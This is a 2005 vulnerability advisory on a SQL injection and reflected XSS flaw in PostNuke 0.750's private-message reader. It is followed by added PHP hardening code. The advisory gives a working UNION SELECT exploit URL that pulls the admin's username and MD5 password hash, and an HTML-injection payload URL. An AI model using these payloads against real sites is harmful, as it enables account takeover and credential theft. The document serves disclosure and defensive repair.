
| Subject: | PostNuke Critical SQL Injection and XSS 0.750=>x |
|---|---|
| Date: | 27 May 2005 22:37:53 -0000 |
-=[ Critical SQL injection and XSS in PostNuke ]=-

Author: sp3x
Date: 27. May 2005

Affected software :
===================

PostNuke version : x => 0.750

Description :
=============

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development, but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC server irc.postnuke.com (channels #postnuke-support, #postnuke-chat and #postnuke) or at the Community Forums located at http://forums.postnuke.com/

Vulnerabilities :
*****************

Critical SQL injection :
========================

Code :
------

/modules/Messages/readpmsg.php

```php
// Vulnerable code from modules/Messages/readpmsg.php as quoted in the advisory.
// $userdata is cast to int before it reaches the WHERE clause, but $start
// (taken from the request) is handed to SelectLimit() untouched and ends up
// in the LIMIT clause of the same statement.
$sql = "SELECT $column[msg_id] AS \"msg_id\",
               $column[msg_image] AS \"msg_image\",
               $column[subject] AS \"subject\",
               $column[from_userid] AS \"from_userid\",
               $column[to_userid] AS \"to_userid\",
               $column[msg_time] AS \"msg_time\",
               $column[msg_text] AS \"msg_text\",
               $column[read_msg] AS \"read_msg\"
        FROM $pntable[priv_msgs]
        WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";
$resultID =& $dbconn->SelectLimit($sql, 1, $start);   // $start is never validated
if ($dbconn->ErrorNo() <> 0) {
    error_log("DB Error: " . $dbconn->ErrorMsg());
    echo $dbconn->ErrorMsg() . "<br />";   // raw DB error, including the injected input, is echoed to the page
    forumerror(0005);
}
```

First, log in as a user in PostNuke, then send a private message to yourself.

After that go to:

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

Note :
------

total_messages=1 - the id given in total_messages must exist.

Now you will see this error message:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL injection],1' at line 10
========================

Exploit SQL injection :
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

And we can see the admin md5 password and nick :)

Cross-site scripting - XSS :
============================

Because the error message reflects the injected input back into the page, XSS attacks are also possible :)

Example :
---------

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

And we get :

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10
========================

How to fix :
============

PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

Greets :
========

cXIb8O3 and pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com
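The root cause of both issues is the unvalidated `start` parameter and the raw database error echoed back to the browser. The following is an added example (not PostNuke's code and not the PNSA 2005-2 patch) that shows the vulnerable query shape beside a validated one; the `build_limit_*` helpers, `safe_offset`, `report_db_error` and the sample SQL are all constructed for illustration.

```php
<?php
// Added example, not PostNuke's code or the PNSA 2005-2 patch: a stand-in for
// the readpmsg.php query construction, showing why the raw $start value is
// exploitable and how to validate it before it reaches SelectLimit().

// Vulnerable shape. The advisory's MySQL error ("... near '[SQL injection],1'")
// shows the raw $start landing in a "LIMIT offset,count" clause; this helper
// assumes that is how the database layer appends it.
function build_limit_vulnerable(string $sql, $start): string
{
    return $sql . " LIMIT " . $start . ",1";
}

// Hardened shape: accept only a non-negative integer offset and fall back to 0
// otherwise, the same treatment $userdata already gets via its (int) cast.
function safe_offset($start): int
{
    $v = filter_var($start, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return ($v === false) ? 0 : $v;
}

function build_limit_safe(string $sql, $start): string
{
    return $sql . " LIMIT " . safe_offset($start) . ",1";
}

// The XSS came from echoing $dbconn->ErrorMsg(), which repeats the injected
// fragment, straight into the page. Keep the detail in the server log and
// hand the browser only a generic, HTML-escaped message.
function report_db_error(string $errorMsg): string
{
    error_log("DB Error: " . $errorMsg);
    return htmlspecialchars("A database error occurred.", ENT_QUOTES, 'UTF-8');
}

// Constructed sample input (not a real request or real PostNuke schema).
$base     = "SELECT msg_id FROM pn_priv_msgs WHERE to_userid='2'";
$tampered = "0 UNION SELECT 1/*";

echo build_limit_vulnerable($base, $tampered), "\n";  // injected SQL survives
echo build_limit_safe($base, $tampered), "\n";        // tampered offset rejected
echo build_limit_safe($base, "3"), "\n";              // legitimate offset kept
echo build_limit_safe($base, "-1"), "\n";             // negative offset rejected
echo report_db_error("syntax error near '" . $tampered . ",1'"), "\n";
```

A request whose `start` value is not a plain non-negative integer is also a simple thing to alert on in web server logs for the `readpmsg` endpoint.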